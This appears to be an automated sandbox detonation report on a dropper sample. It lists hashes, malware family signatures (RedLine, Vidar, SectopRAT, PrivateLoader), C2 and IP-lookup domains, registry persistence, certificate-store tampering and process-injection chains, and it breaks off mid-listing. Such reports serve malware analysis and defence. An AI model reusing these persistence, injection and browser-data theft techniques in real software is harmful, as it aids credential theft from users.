SHA1 583aa730e302fe0015cdb0dee4e279f193d66d87
SHA256 e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5
SHA512 c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

memory/4760-199-0x0000000005860000-0x0000000005E78000-memory.dmp

memory/4760-200-0x00000000052A0000-0x00000000052B2000-memory.dmp

memory/4760-201-0x0000000005340000-0x000000000537C000-memory.dmp

memory/2656-202-0x00000000048E0000-0x0000000004916000-memory.dmp

memory/2656-204-0x0000000004F60000-0x0000000005588000-memory.dmp

memory/4760-203-0x0000000005380000-0x00000000053CC000-memory.dmp

memory/2656-207-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/2656-206-0x0000000005700000-0x0000000005766000-memory.dmp

memory/2656-205-0x0000000004F20000-0x0000000004F42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4xfsz0p.s1q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4760-219-0x00000000055E0000-0x00000000056EA000-memory.dmp

memory/2656-220-0x00000000058E0000-0x0000000005C34000-memory.dmp

memory/2656-221-0x0000000005DB0000-0x0000000005DCE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS76B2.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/2656-223-0x0000000006480000-0x00000000064B2000-memory.dmp

memory/2656-224-0x0000000073EB0000-0x0000000073EFC000-memory.dmp

memory/2656-234-0x00000000064C0000-0x00000000064DE000-memory.dmp

memory/2656-235-0x00000000070C0000-0x0000000007163000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e443ee4336fcf13c698b8ab5f3c173d0
SHA1 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA256 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
SHA512 cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

memory/2656-242-0x0000000007820000-0x0000000007E9A000-memory.dmp

memory/2656-243-0x00000000071E0000-0x00000000071FA000-memory.dmp

memory/2656-244-0x0000000007250000-0x000000000725A000-memory.dmp

memory/2656-250-0x0000000007460000-0x00000000074F6000-memory.dmp

\??\pipe\LOCAL\crashpad_4092_YTVGSEXPLPVIISPH

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56a4f78e21616a6e19da57228569489b
SHA1 21bfabbfc294d5f2aa1da825c5590d760483bc76
SHA256 d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb
SHA512 c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2e613877ba30067611bb2c2e1e8c02eb
SHA1 3e5528270361b8c0e22a97e80db1da62a4a1a469
SHA256 b23176c536f1299706fe85369e026a879fcf98bf8fc8381be77dec95c6605a6b
SHA512 849c3e758963994ebe001e10aba8662022a0be15596180772f21c060936f118c4e46f86f62ab7f0f780111e9fc1516925144bb9d5de72490f849bd4de6d9b872

memory/2656-262-0x00000000073E0000-0x00000000073F1000-memory.dmp

memory/2656-263-0x0000000007410000-0x000000000741E000-memory.dmp

memory/2656-264-0x0000000007420000-0x0000000007434000-memory.dmp

memory/2656-265-0x0000000007520000-0x000000000753A000-memory.dmp

memory/2656-266-0x0000000007500000-0x0000000007508000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 acb4fa771a71663077ce1b9eac1bab3a
SHA1 797008a96ec3e23ec74289d49ae9120028045070
SHA256 366c2581a3ce28374993d73565640180a949078578d9b9b895dffdcb218f979e
SHA512 15100fe991300e962749bb2c7d41106963c00c6cf0b1488efb4f4e14edeb3744422e19399a83200fe94b7953f5297f9c44fa92b1ad1070b57bd7a6bce45dcb32

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9ab891abd4504574742cc01b982add54
SHA1 45f1cb1d9a537e94662093e7b5f55c16fd6b2bf2
SHA256 1c3c8c2a8c254349999ef71657ae94efdbabf12f2a31ac29bd0b45f55e1b9242
SHA512 9d0b46a56dfb4f0538ffa04e3e08a567c426e2408f0123e93a77b44f9761042f2c4b72495add71240840d52bd6ade7699fa1a72f4f2e2a07bc24fb854908a979

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 be0b4b1c809dc419f44b990378cbae31
SHA1 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806
SHA256 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53
SHA512 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

memory/5444-315-0x0000000000140000-0x0000000000146000-memory.dmp

memory/5580-318-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-319-0x0000000000890000-0x00000000008B0000-memory.dmp

memory/5580-317-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-321-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-325-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-324-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-323-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-322-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-326-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-327-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5580-347-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 12:12

Reported

2024-12-06 12:15

Platform

win7-20240903-en

Max time kernel

56s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1912 set thread context of 1360 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7C7DF041-B3CB-11EF-9C44-E61828AB23DD} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob value omitted] C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob value omitted] C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
